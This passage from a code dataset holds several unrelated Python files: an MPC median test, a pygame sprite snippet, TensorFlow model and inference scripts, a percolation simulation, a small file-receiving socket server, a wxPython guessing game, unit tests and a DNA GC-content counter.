fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0],'y':d_2[:,index2:index2+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n d_tmp = exe.run(feed={'x': d_2[:, index2:index2+1], 'y': d_3[:, index3:index3+1], 'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0], 'y': d_3[:, index3:index3+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n return d_3[:,index3:index3+1]\r\n else:\r\n return d_2[:,index2:index2+1]\r\n else:\r\n d_tmp = exe.run(feed={'x': d_1[:, index1:index1+1], 'y': d_3[:, index3:index3+1], 'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0], 'y': d_3[:, index3:index3+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n return d_3[:,index3:index3+1]\r\n else:\r\n return d_1[:,index1:index1+1] \r\n\r\n role = 1\r\n d_1 = np.load('data_C1_P1.npy',allow_pickle=True)\r\n d_2 = np.load('data_C1_P2.npy',allow_pickle=True)\r\n d_3 = np.load('data_C1_P3.npy',allow_pickle=True)\r\n d_zero = np.full((1), fill_value=0).astype('float32')\r\n pfl_mpc.init(\"aby3\", role, \"localhost\", self.server, int(self.port))\r\n x = pfl_mpc.data(name='x', shape=[1], dtype='int64')\r\n y = pfl_mpc.data(name='y', shape=[1], dtype='int64')\r\n zero = fluid.data(name='zero', shape=[1], dtype='float32')\r\n op_add = pfl_mpc.layers.elementwise_add(x=x, y=y)\r\n math_mul = pfl_mpc.layers.elementwise_mul(x, y)\r\n exe = 
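# Illustrative sketch (not part of the record above): a plaintext reference for
# what getKthElement in mid3_C1.py computes -- the k-th smallest value across
# three sorted arrays. The MPC version replaces every comparison with an
# elementwise_sub/greater_than round over secret shares; on public data the
# same answer falls out of a plain merge:
import heapq

def kth_of_three(a, b, c, k):
    # heapq.merge lazily merges inputs that are already sorted
    return list(heapq.merge(a, b, c))[k - 1]

assert kth_of_three([1, 4], [2, 5], [3, 6], 4) == 4  # merged: 1,2,3,4,5,6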
fluid.Executor(place=fluid.CPUPlace())\r\n\r\n d_1_length, d_2_length, d_3_length = d_1.shape[1], d_2.shape[1], d_3.shape[1]\r\n totalLength = d_1_length + d_2_length + d_3_length\r\n if totalLength % 2 == 1:\r\n results = getKthElement((totalLength + 1) // 2)\r\n np.save('result_C1.npy', results[0])\r\n else:\r\n mid_pre = getKthElement((totalLength) // 2)\r\n mid_post = getNextElement(mid_pre[1],mid_pre[2],mid_pre[3],mid_pre[4])\r\n tmp = exe.run(feed={'x': mid_pre[0],'y':mid_post,'zero': d_zero}, fetch_list=[op_add])\r\n d_tmp = np.load('data_C1_tmp.npy',allow_pickle=True)\r\n results = exe.run(feed={'x': tmp[0],'y':d_tmp,'zero': d_zero}, fetch_list=[math_mul])\r\n np.save('result_C1.npy', results[0])\r\n\r\n def test_mid3_C1(self):\r\n ret = self.multi_party_run1(target=self.findMedianSortedArrays)\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","sub_path":"python/paddle_fl/mpc/tests/demo/mid/mid3/mid3_C1.py","file_name":"mid3_C1.py","file_ext":"py","file_size_in_byte":9793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"248836296","text":"import pygame\nfrom pygame.sprite import Sprite\n\nclock = pygame.time.Clock()\nall_sprites = pygame.sprite.Group()\n# Update\nall_sprites.update()\n\n# Draw / render\nscreen.fill(BLACK)\nall_sprites.draw(screen)\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((50, 50))\n self.image.fill(GREEN)\n self.rect = self.image.get_rect()\n self.rect.center = (WIDTH / 2, HEIGHT / 2)\n\nall_sprites = pygame.sprite.Group()\nplayer = Player()\nall_sprites.add(player)","sub_path":"kids_can_code/sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"606147792","text":"import mala\nimport tensorflow as tf\nimport json\n\ndef create_network(input_shape, name):\n\n tf.reset_default_graph()\n\n raw = tf.placeholder(tf.float32, shape=input_shape)\n raw_batched = tf.reshape(raw, (1, 1) + input_shape)\n\n unet, _, _ = mala.networks.unet(raw_batched, 12, 5, [[1,3,3],[1,3,3],[3,3,3]])\n\n embedding_batched, _ = mala.networks.conv_pass(\n unet,\n kernel_sizes=[1],\n num_fmaps=10,\n activation='sigmoid')\n\n output_shape_batched = embedding_batched.get_shape().as_list()\n output_shape = output_shape_batched[1:] # strip the batch dimension\n\n embedding = tf.reshape(embedding_batched, output_shape)\n\n gt_embedding = tf.placeholder(tf.float32, shape=output_shape)\n embedding_loss_weights = tf.placeholder(tf.float32, shape=output_shape)\n loss = tf.losses.mean_squared_error(\n gt_embedding,\n embedding,\n embedding_loss_weights)\n\n summary = tf.summary.scalar('setup02_eucl_loss', loss)\n\n opt = tf.train.AdamOptimizer(\n learning_rate=0.5e-4,\n beta1=0.95,\n beta2=0.999,\n epsilon=1e-8)\n optimizer = opt.minimize(loss)\n\n output_shape = output_shape[1:]\n print(\"input shape : %s\"%(input_shape,))\n print(\"output shape: %s\"%(output_shape,))\n\n tf.train.export_meta_graph(filename=name + '.meta')\n\n config = {\n 'raw': raw.name,\n 'embedding': embedding.name,\n 'gt_embedding': gt_embedding.name,\n 'embedding_loss_weights': embedding_loss_weights.name,\n 'loss': loss.name,\n 'optimizer': optimizer.name,\n 'input_shape': input_shape,\n 'output_shape': output_shape,\n 'summary': summary.name\n }\n with open(name + '.json', 'w') as f:\n json.dump(config, f)\n\nif __name__ == \"__main__\":\n\n z=0\n 
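# Illustrative sketch: sprites.py above interleaves main-loop fragments with
# the class definition and uses screen/BLACK/WIDTH/HEIGHT/GREEN before they
# exist. A minimal runnable ordering of the same pieces (constant values are
# assumptions):
import pygame

WIDTH, HEIGHT = 640, 480
BLACK, GREEN = (0, 0, 0), (0, 255, 0)

class Player(pygame.sprite.Sprite):
    def __init__(self):
        super().__init__()
        self.image = pygame.Surface((50, 50))
        self.image.fill(GREEN)
        self.rect = self.image.get_rect(center=(WIDTH / 2, HEIGHT / 2))

if __name__ == '__main__':
    pygame.init()
    screen = pygame.display.set_mode((WIDTH, HEIGHT))
    clock = pygame.time.Clock()
    all_sprites = pygame.sprite.Group(Player())
    running = True
    while running:
        clock.tick(60)
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
        all_sprites.update()
        screen.fill(BLACK)
        all_sprites.draw(screen)
        pygame.display.flip()
    pygame.quit()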
xy=0\n\n create_network((84, 268, 268), 'train_lsd_net')\n create_network((96+z, 484+xy, 484+xy), 'config')\n\n with open('config.json', 'r') as f:\n config = json.load(f)\n config.update({\n 'out_dims': 10,\n 'out_dtype': 'float32'\n })\n with open('config.json', 'w') as f:\n json.dump(config, f)\n","sub_path":"examples/lsd/mknet.py","file_name":"mknet.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"258705962","text":"from matrixutils import rand_bool_matr\nfrom pprint import pprint\nimport matplotlib.pyplot as plt\nimport argparse\nfrom matrixutils import transpose, dimen, rand_bool_matrix_3d\nfrom geomutils import neighbours, POINTS3D\nimport sys\nimport numpy as np\nfrom binary_search_function import inverse\nfrom pynverse import inversefunc\nfrom itertools import product\nimport random\n\n\ndef flow_hash(open_state):\n n = len(open_state)\n coords = list(product(range(n), range(n), range(n)))\n remaining = coords\n res = {}\n\n def valid(neigh):\n r, c, z = neigh # z = depth as in zorder\n return (0 <= r < n) and (0 <= c < n) and (0 <= z < n)\n\n def get(coord):\n if valid(coord):\n return res.get(coord, None)\n return None\n\n def set(coord, value):\n if valid(coord):\n res[coord] = value\n\n def any_true_neigh(coord):\n neighs = neighbours(coord, points=POINTS3D)\n for neigh in neighs:\n if get(neigh) == True:\n return True\n return None\n\n def nb_false_neighbours(coord):\n return sum([get(neigh) == False for neigh in neighbours(coord, points=POINTS3D)])\n\n def nb_valid_neigbours(coord):\n return sum([valid(neigh) for neigh in neighbours(coord, points=POINTS3D)])\n\n def calc_for(coord):\n i, j, k = coord\n if i == 0:\n set(coord, open_state[i][j][k])\n return\n if open_state[i][j][k] == False:\n set(coord, False)\n return\n if any_true_neigh(coord) == True:\n set(coord, True)\n return\n if nb_false_neighbours(coord) == nb_valid_neigbours(coord):\n set(coord, False)\n return\n while True:\n prev_rem = len(remaining)\n for coord in remaining:\n calc_for(coord)\n remaining = [coord for coord in coords if coord not in res.keys()]\n if not(prev_rem > len(remaining)):\n break\n # print('remaining', remaining)\n # print(remaining[0])\n # nes = neighbours(remaining[0], points=POINTS3D)\n # print(nb_false_neighbours(remaining[0]))\n # print(nb_valid_neigbours(remaining[0]))\n # for n in nes:\n # print(n, res.get(n,None))\n return as_matrix3d(res, n)\n\n\ndef as_matrix3d(hashed_coord, n):\n res = np.full([n, n, n], False, np.bool_)\n for coord in hashed_coord:\n res[coord] = hashed_coord[coord]\n return res\n\n\ndef percolates(open_state):\n flw = flow_hash(open_state)\n return flw[-1].any()\n\n\ndef experiment(n, prob, nb_trials):\n success = 0\n return sum([percolates(rand_bool_matrix_3d(n, n, n, prob)) for i in range(nb_trials)])\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Percolation for a random cube')\n parser.add_argument('n', type=int, help='number of rows')\n parser.add_argument(\n 'p', type=float, help='probability for the cell be True in the matrix cube')\n parser.add_argument('--estimate-threshold',\n help='estimate the threshold of percolates', action='store_true')\n parser.add_argument('--nb-trials', type=int,\n help='number of times the experiment must be carried out')\n args = parser.parse_args()\n n = args.n\n p = args.p\n nb_trials = args.nb_trials\n\n matr = rand_bool_matrix_3d(n, n, n, p)\n # pprint(matr)\n f = flow_hash(matr)\n # pprint(f)\n # 
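# Illustrative sketch: the fixed-point loop in flow_hash (percolation3d.py
# above) rebuilds `remaining` by rescanning the full coordinate list on every
# pass; keeping the unresolved frontier as a set only touches cells that are
# still open. calc_for/res play the same roles as in the record:
def fixed_point(coords, res, calc_for):
    remaining = set(coords)
    while remaining:
        before = len(remaining)
        for coord in list(remaining):
            calc_for(coord)
        remaining.difference_update(res)  # drop everything now resolved
        if len(remaining) == before:      # no progress this pass: stop
            break
    return remaining

# tiny self-check: everything resolves in one pass
res = {}
def calc_for(c):
    res[c] = c % 2
assert fixed_point(range(5), res, calc_for) == set()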
print(percolates(matr))\n # pprint(matr)\n # res = flow_hash(matr)\n # pprint(res)\n if nb_trials is None:\n nb_trials = 100\n\n def perc_func(p):\n success = experiment(n, p, nb_trials)\n return success / nb_trials\n\n NBINTERV = 11\n prob_of_success = [0] * NBINTERV\n probs = np.linspace(0, 1, NBINTERV)\n for i, p in enumerate(probs):\n success = experiment(n, p, nb_trials)\n prob_of_success[i] = success / nb_trials\n print(success, nb_trials, success / nb_trials)\n print(prob_of_success)\n fig, ax = plt.subplots()\n ax.set_xlim(0, 1)\n ax.set_ylim(0, 1)\n plt.title('Probability of percolation nb_sites :' +\n str(n) + '³' + ' nb_trials: ' + str(nb_trials))\n plt.xlabel('site vacancy probability')\n plt.ylabel('percolation probability')\n success_color = {True: 'green', False: 'red'}\n colors = [success_color[p > 0.5] for p in prob_of_success]\n plt.scatter(probs, prob_of_success, color=colors)\n plt.show()\n if args.estimate_threshold:\n print('Estimating threshold value...')\n a = inversefunc(perc_func, y_values=0.5, domain=[0.3, 0.8])\n b = inverse(perc_func, 0.5, 0.3, 0.8)\n print('Threshold value using pynverse', a)\n print('Threshold value is', b)\nif __name__ == \"__main__\":\n main()\n","sub_path":"percolation3d.py","file_name":"percolation3d.py","file_ext":"py","file_size_in_byte":4731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"237180274","text":"import os, time, json\nos.environ['TF_CPP_MIN_LOG_LEVEL']='3'\nimport tensorflow as tf\nimport numpy as np\n\nbatch_size = 10\n\ndef read_file(filename):\n '''\n read tfrecord files\n '''\n def _get_num(filepath):\n num=0\n t1 = time.time()\n for record in tf.python_io.tf_record_iterator(filepath):\n num=num+1\n t2 = time.time()\n print(\"{}s taken to get the number of files in tfrecord.\".format(str(t2-t1)))\n return num\n\n num_files=_get_num(filename)\n filename_queue = tf.train.string_input_producer([filename])\n\n reader = tf.TFRecordReader()\n _, serialized_example = reader.read(filename_queue)\n features = tf.parse_single_example(serialized_example,features = {\n 'image/encoded': tf.FixedLenFeature([], tf.string),\n 'image/class/label': tf.FixedLenFeature([], tf.string),\n 'image/filepath': tf.FixedLenFeature([], tf.string),})\n\n image_data=tf.cast(features['image/encoded'], tf.string)\n image_data=tf.image.decode_image(image_data)\n label = tf.cast(features['image/class/label'], tf.string)\n filepath = tf.cast(features['image/filepath'], tf.string)\n\n return num_files, image_data, label, filepath\n\ndef get_label():\n '''\n read label file\n '''\n label_map_path = \"./labelmap/label.txt\"\n label_map_file = open(label_map_path)\n label_map = {}\n for line_number, label in enumerate(label_map_file.readlines()):\n label_map[line_number] = label[:-1]\n line_number += 1\n label_map_file.close()\n\n return label_map\n\ndef predict(filename):\n # get label\n label_map = get_label()\n\n # read tfrecord file\n num_files, image_data, label, filepath = read_file(filename)\n # image_batch, file_batch = tf.train.batch([image_data, filepath],batch_size=8)\n\n # session\n with tf.Session() as sess:\n init_op = tf.initialize_all_variables()\n sess.run(init_op)\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n t1 = time.time()\n image_data_list, file_list, res = [], [], []\n # [input_0, _label, _filepath] = sess.run([image_data, label, filepath])\n print(image_data)\n\n for i in range(num_files):\n # image_data = 
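# Illustrative sketch: percolation3d.py above estimates the percolation
# threshold by numerically inverting the empirical success-rate curve
# (pynverse / a custom binary search). The core idea on any monotone function,
# with a plain bisection (toy target function and tolerance are assumptions):
def bisect_inverse(f, target, lo, hi, tol=1e-4):
    while hi - lo > tol:
        mid = (lo + hi) / 2
        if f(mid) < target:
            lo = mid
        else:
            hi = mid
    return (lo + hi) / 2

# p**2 is monotone on [0, 1] and equals 0.25 at p = 0.5
assert abs(bisect_inverse(lambda p: p ** 2, 0.25, 0.0, 1.0) - 0.5) < 1e-3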
tf.image.resize_images(image_data, [331, 331])\n t_a1 = time.time()\n [image, file] = sess.run([image_data, filepath])\n t_a2 = time.time()\n # print(\"sess run time: {}\".format(t_a2-t_a1))\n image = tf.image.resize_images(image, [331, 331])\n image = sess.run(image)\n image_data_list.append(image)\n file_list.append(file)\n if (i != 0 and i % batch_size == 0) or (i == num_files-1):\n input = np.asarray(image_data_list)\n input = input.reshape(-1, 331, 331, 3)\n t_b1 = time.time()\n with tf.device('/gpu:0'):\n predictions = inference_session.run(output_layer, feed_dict={input_layer: input})\n predictions = np.squeeze(predictions)\n t_b2 = time.time()\n\n print(\"inference_session #{} run time: {}\".format(i, t_b2-t_b1))\n overall_result = np.argmax(np.sum(predictions, axis=0))\n # print(\"{}: {}\".format(i, overall_result))\n # res.append(np.argmax(np.sum(prediction, axis=0)) for prediction in predictions)\n image_data_list = []\n\n t2 = time.time()\n print(\"average speed: {} s/image\".format((t2-t1)/num_files))\n\n\nif __name__ == '__main__':\n model = \"./model/nasnet_large_v1.pb\"\n model_graph = tf.Graph()\n with model_graph.as_default():\n with tf.gfile.FastGFile(model, 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(graph_def, name='')\n input_layer = model_graph.get_tensor_by_name(\"input:0\")\n output_layer = model_graph.get_tensor_by_name('final_layer/predictions:0')\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n inference_session = tf.Session(graph = model_graph, config=config)\n initializer = np.zeros([1, 331, 331, 3])\n inference_session.run(output_layer, feed_dict={input_layer: initializer})\n file_list = []\n processed_files = []\n for path, dir, files in os.walk(\"./input_data\"):\n for file in files:\n if file == '.DS_Store': continue\n print(\"Reading file {}\".format(file))\n file_path = os.path.join('./input_data', file)\n file_list.append(file_path)\n res = predict(file_path)\n processed_files.append(file)\n\n with open('./model_output/processed_files/test_{}_processed_files.json'.format(model), 'w') as f:\n f.write(json.dump(processed_files))\n","sub_path":"predict4.py","file_name":"predict4.py","file_ext":"py","file_size_in_byte":4854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"506205692","text":"import socket\n\nimport os\n\nfrom sorttree import server_recv\n\nfrom sorttree import sort_tree\n\n\n# print('enter ip server')\n# host = input()\nhost = '127.0.0.1'\n\n# print('enter port number')\n# port = int(input())\nport = 9091\n\n# print('enter the path to the folder in which the files will be saved')\n# drctr_path_ = input()\ndrctr_path = \"/Users/K/Documents/server\"\n\n# open socket\nsock = socket.socket()\nsock.bind((host, port))\nsock.listen(1)\nconn, addr = sock.accept()\n\n# recieves folder name\ndrctr_name = conn.recv(20)\ndrctr_name = str(drctr_name.decode(\"utf-8\"))\nconn.send(b'ok')\n\npath_sort = os.path.join(drctr_path, drctr_name)\n\n# function recieves diriectory form client and saves\nserver_recv(drctr_path, conn)\n\nsock.close()\nconn.close()\n\n# function sorts recived files\nsort_tree(path_sort)\n\n\n\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"187611045","text":"import pandas as pd\nimport plotly\nimport plotly.plotly as py\nimport plotly.graph_objs as 
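# Illustrative sketch: the loop in predict4.py above calls
# tf.image.resize_images on every iteration, which appends a fresh resize op
# to the default graph each time, so the graph grows with i. The TF1-era
# pattern is one placeholder + one resize op built before the loop (names
# here are assumptions):
import tensorflow as tf

raw_image = tf.placeholder(tf.float32, shape=[None, None, 3])
resized = tf.image.resize_images(raw_image, [331, 331])

# then, inside the read loop:
#   image, file = sess.run([image_data, filepath])
#   image = sess.run(resized, feed_dict={raw_image: image})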
go\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\n\nplotly.offline.init_notebook_mode(connected=True)\nimport plotly.io as pio\nimport os\n\ndef make_plot(x, z):\n data = [go.Choropleth(\n locations = x,\n z = z,\n text = x,\n locationmode=\"country names\",\n autocolorscale = True,\n marker = go.choropleth.Marker(\n line = go.choropleth.marker.Line(\n color = 'rgb(0,0,0)',\n width = 0.5\n )),\n colorbar = go.choropleth.ColorBar(\n len=0.5\n ),\n )]\n\n layout = go.Layout(\n height=700,\n width=700,\n margin={\"t\": 0, \"b\": 0, \"l\": 0, \"r\": 0},\n geo = go.layout.Geo(\n showframe = True,\n showcoastlines = True,\n showcountries = True,\n projection = go.layout.geo.Projection(\n type = 'mercator'\n )\n )\n )\n\n fig = go.Figure(data = data, layout = layout)\n iplot(fig)","sub_path":"unicorns-per-capita/.ipynb_checkpoints/plot-checkpoint.py","file_name":"plot-checkpoint.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"510357152","text":"import wx\nimport random\n\n\ndef Font(size):\n return wx.Font(size, wx.DEFAULT, wx.FONTSTYLE_NORMAL, wx.NORMAL)\n\n\nclass Frame(wx.Frame):\n def __init__(self):\n super().__init__(None, -1, \"猜数字小游戏\", size=(310, 150),\n style=wx.DEFAULT_FRAME_STYLE ^ wx.RESIZE_BORDER ^ wx.MAXIMIZE_BOX)\n self.Center()\n\n self.Number = random.randint(1, 10)\n self.Count = 0\n\n panel = wx.Panel(self)\n\n wx.StaticText(panel, -1, \"猜猜我心里想的是什么数字吧!\", (10, 10)).SetFont(Font(15))\n\n self.NumberChooser = wx.ComboBox(panel, -1, \"1\", (80, 40), (120, 30),\n choices=['1', '2', '3', '4', '5',\n '6', '7', '8', '9', '10'],\n style=wx.CB_READONLY)\n\n self.ConfirmButton = wx.Button(panel, -1, \"确定\", (90, 75), (100, 30))\n self.ConfirmButton.Bind(wx.EVT_BUTTON, self.Confirm)\n\n def Confirm(self, event):\n self.Count += 1\n user_number = int(self.NumberChooser.GetStringSelection())\n\n if self.Number == user_number:\n wx.MessageBox(\"恭喜你,猜对了!你一共猜了 {} 次!\".format(str(self.Count)),\n \"你猜对了\", parent=self)\n wx.MessageBox(\"游戏结束\", \"游戏结束\", parent=self)\n exit()\n elif self.Number > user_number:\n wx.MessageBox(\"你怎么会猜这么小的数字了\",\n \"猜错了\", style=wx.OK | wx.CENTER | wx.ICON_WARNING, parent=self)\n elif self.Number < user_number:\n wx.MessageBox(\"你猜的太大了\",\n \"猜错了\", style=wx.OK | wx.CENTER | wx.ICON_WARNING, parent=self)\n\n\nif __name__ == '__main__':\n app = wx.App()\n Frame().Show()\n app.MainLoop()","sub_path":"gui_2.py","file_name":"gui_2.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"456481347","text":"# -*- coding:utf-8 -*-\n# create_time: 2018/12/3 14:03\n# __author__ = 'brad'\n\nclass AddClassMethod(classmethod):\n # def __init__(self, **kwargs):\n # print(kwargs)\n def __new__(cls, *args, **kwargs):\n print(args)\n print(kwargs)\n super.__new__(cls,args, kwargs)\n\n # def __get__(self, *args, **kwargs): # real signature unknown\n # \"\"\" Return an attribute of instance, which is of type owner. 
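# Illustrative sketch: the AddClassMethod record that begins above calls
# super.__new__(cls, ...) on the super type itself, which raises TypeError
# before test() can ever run. One simple route is a standalone descriptor
# rather than subclassing classmethod -- __init__ plus __get__ suffice:
class AddClassMethod:
    def __init__(self, func):
        self.func = func

    def __get__(self, obj, owner=None):
        owner = owner if owner is not None else type(obj)
        def bound(*args, **kwargs):
            return self.func(owner, *args, **kwargs)
        return bound

class A:
    @AddClassMethod
    def test(cls, **kwargs):
        print('test', cls.__name__, kwargs)

A.test(id=5)  # -> test A {'id': 5}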
\"\"\"\n # super().__get__(args, kwargs)\n\n\nclass A:\n\n @AddClassMethod\n def test(cls, **kwargs):\n print('test')\n\n\nA.test(id=5)\n","sub_path":"a_concept/classmethod_learn/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"50142962","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2015, Frappe Technologies and Contributors\n# See license.txt\nfrom __future__ import unicode_literals\n\nimport frappe\nimport unittest\n\nfrom frappe import _\n\nclass TestTranslation(unittest.TestCase):\n\tdef tearDown(self):\n\t\tfrappe.local.lang = 'en'\n\t\tfrappe.local.lang_full_dict=None\n\n\tdef test_doctype(self):\n\t\ttranslation_data = get_translation_data()\n\t\tfor key, val in translation_data.items():\n\t\t\tfrappe.local.lang = key\n\t\t\tfrappe.local.lang_full_dict=None\n\t\t\ttranslation = create_translation(key, val)\n\t\t\tself.assertEquals(_(translation.source_name), val[1])\n\n\t\t\tfrappe.delete_doc('Translation', translation.name)\n\t\t\tfrappe.local.lang_full_dict=None\n\t\t\tself.assertEquals(_(translation.source_name), val[0])\n\ndef get_translation_data():\n\thtml_source_data = \"\"\" \n\t\t\t\t\t\t\tTest Data \"\"\"\n\thtml_translated_data = \"\"\" \n\t\t\t\t\t\t\t testituloksia \"\"\"\n\n\treturn {'hr': ['Test data', 'Testdaten'],\n\t\t\t'ms': ['Test Data','ujian Data'],\n\t\t\t'et': ['Test Data', 'testandmed'],\n\t\t\t'en': ['Quotation', 'Tax Invoice'],\n\t\t\t'fi': [html_source_data, html_translated_data]}\n\ndef create_translation(key, val):\n\ttranslation = frappe.new_doc('Translation')\n\ttranslation.language_code = key\n\ttranslation.source_name = val[0]\n\ttranslation.target_name = val[1]\n\ttranslation.save()\n\treturn translation\n","sub_path":"frappe/core/doctype/translation/test_translation.py","file_name":"test_translation.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"28511623","text":"#!/usr/bin/env python3\n# encoding: utf-8\n\ndef main():\n\ta, b = 1, 2\n\tsum = 0\n\twhile a < 4000000:\n\t\t\ta, b = b, a + b\n\t\t\tif not a%2:\n\t\t\t\tsum = sum + a\n\tprint(sum)\n\n\n\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"euler1.py","file_name":"euler1.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"540377229","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 2 13:54:43 2018\r\n\r\n@author: tcarr\r\n\"\"\"\r\nimport sys \r\nimport itertools\r\nDNA = None\r\nfile = \"CD11b.fa\"\r\nf = open(file,\"r\")\r\nDNA = f.read().splitlines()\r\nprint(DNA)\r\nkey = lambda sep: sep == '>'\r\n\r\n\r\nA = 0\r\nC = 0\r\nG = 0\r\nT = 0\r\nother = 0\r\nfor i in range (0, len(DNA)-1):\r\n if DNA[i]==\"A\":\r\n A += 1\r\n elif DNA[i]==\"C\":\r\n C += 1\r\n elif DNA[i]==\"G\":\r\n G += 1\r\n elif DNA[i]==\"T\":\r\n T += 1\r\n else:\r\n other += 1\r\n\r\nif len(sys.argv)==2:\r\n print(\"%A: \",A/(A+C+G+T)*100)\r\n print(\"%C: \",C/(A+C+G+T)*100)\r\n print(\"%G: \",G/(A+C+G+T)*100)\r\n print(\"%T: \",T/(A+C+G+T)*100)\r\n print(\"%other: \",other/(A+C+G+T)*100)\r\n print(\"\\n\")\r\n print(\"% GC\" ,(C+G)/(A+C+G+T)*100)\r\n print(\"% AT \",(A+T)/(A+C+G+T)*100)\r\nelif len(sys.argv)==3:\r\n if sys.argv[2]==\"GC\":\r\n print(\"% GC \" ,(C+G)/(A+C+G+T)*100)\r\n elif sys.argv[2]==\"AT\":\r\n print(\"% AT \",(A+T)/(A+C+G+T)*100)\r\n else:\r\n 
print(\"Type \\\"GC\\\" for % GC or \\\"AT\\\" for % AT\")\r\nelse:\r\n print(\"Please only pass a file path and GC/AT option for this script.\")\r\n ","sub_path":"mult_ensembl_gc.py","file_name":"mult_ensembl_gc.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"91628351","text":"import os\nimport unittest\n\nfrom covid_analysis.model import Config, CountrySummary\n\n\nclass CountrySummaryTest(unittest.TestCase):\n def test_it_can_be_converted_to_flat_dict(self):\n summary = CountrySummary()\n summary.name = \"test\"\n summary.new_deaths = 100\n summary.total_deaths = 1000\n summary.new_confirmed = 200\n summary.total_confirmed = 2000\n summary.new_recovered = 300\n summary.total_recovered = 3000\n\n self.assertEqual(\n {\n \"name\": \"test\",\n \"new_deaths\": 100,\n \"total_deaths\": 1000,\n \"new_confirmed\": 200,\n \"total_confirmed\": 2000,\n \"new_recovered\": 300,\n \"total_recovered\": 3000,\n },\n summary.to_dict(),\n )\n\n def test_two_country_summaries_can_be_compared_for_equality(self):\n summary1 = CountrySummary()\n summary1.name = \"test\"\n summary1.new_deaths = 100\n summary1.total_deaths = 1000\n summary1.new_confirmed = 200\n summary1.total_confirmed = 2000\n summary1.new_recovered = 300\n summary1.total_recovered = 3000\n\n summary2 = CountrySummary()\n summary2.name = \"test\"\n summary2.new_deaths = 100\n summary2.total_deaths = 1000\n summary2.new_confirmed = 200\n summary2.total_confirmed = 2000\n summary2.new_recovered = 300\n summary2.total_recovered = 3000\n\n self.assertEqual(summary1, summary2)\n","sub_path":"covid_analysis/tests/CountrySummaryTest.py","file_name":"CountrySummaryTest.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"533365624","text":"from elements import*\nfrom gravity import Gravity\nfrom planet import Planet\nfrom meteor import Meteor\nfrom shopWindow import*\n\nclass World:\n\n def __init__(self,parent):\n\n self.parent = parent\n self.width = parent.width\n self.height = parent.height\n self.planet = Planet(parent,self)\n self.objects = []\n self.message = []\n\n self.satellite = 0\n\n self.info = [['Temperature',0],['Air pressure',0],['Water',0],['CO2',0],['O2',0],['Satellite',0],['Mine',0],['Nuclear',0],['Algae',0],['Tree',0],['Animal',0]]\n\n def addObject(self,moverName,location,velocity):\n \n if moverName == '':\n return\n mover = Meteor(self.parent,self,location=location,velocity=velocity)\n\n if Inventory.items[ShopWindow.items.index(moverName)] == 0:\n return\n Inventory.items[ShopWindow.items.index(moverName)] -= 1\n\n if moverName == 'Fire':\n mover = Fire(self.parent,self,location=location,velocity=velocity,image='red.png')\n\n if moverName == 'Ice':\n mover = Ice(self.parent,self,location=location,velocity=velocity,image='blue.png')\n\n if moverName == 'Dry Ice':\n mover = DryIce(self.parent,self,location=location,velocity=velocity,image='purple.png')\n\n if moverName == 'Satellite':\n mover = Satellite(self.parent,self,location=location,velocity=velocity,image='satellite.png')\n \n if moverName == 'Mine':\n mover = Mine(self.parent,self,location=location,velocity=velocity,image='mine.png')\n \n if moverName == 'Nuclear':\n mover = Nuclear(self.parent,self,location=location,velocity=velocity,image='nuclear.png')\n \n if moverName == 'Algae':\n mover = 
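# Illustrative sketch: mult_ensembl_gc.py above iterates over
# f.read().splitlines(), so each DNA[i] is a whole line (and range(0,
# len(DNA)-1) skips the final line); with a real FASTA file the single-letter
# comparisons almost never match and lines pile up in `other`. A per-base
# count that also skips '>' headers:
def gc_content(path):
    counts = {'A': 0, 'C': 0, 'G': 0, 'T': 0}
    with open(path) as f:
        for line in f:
            if line.startswith('>'):
                continue
            for base in line.strip().upper():
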